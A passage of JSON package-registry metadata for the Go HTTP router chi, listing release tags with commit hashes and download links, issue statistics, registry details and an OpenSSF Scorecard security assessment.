hi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.214Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":0.42602046828582874,"forks_count":0.6257877057855061,"average":4.349202109452245},"purl":"pkg:golang/gopkg.in/chi.v4","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/gopkg.in/chi.v4","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/gopkg.in/chi.v4","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/gopkg.in/chi.v4/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v4/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v4/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v4/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v4/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v4/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fchi.v4/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":10867420,"name":"github.com/go-CHI/chi/v5","ecosystem":"go","description":null,"homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-CHI/chi","keywords_array":[],"namespace":null,"versions_count":24,"first_release_published_at":"2021-02-28T00:11:55.000Z","latest_release_published_at":"2026-07-05T18:51:45.000Z","latest_release_number":"v5.3.1","last_synced_at":"2026-08-12T02:06:17.858Z","created_at":"2024-09-08T08:05:24.518Z","updated_at":"2026-08-12T02:06:17.858Z","registry_url":"https://pkg.go.dev/github.com/go-CHI/chi/v5","install_command":"go get github.com/go-CHI/chi/v5","documentation_url":"https://pkg.go.dev/github.com/go-CHI/chi/v5#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposito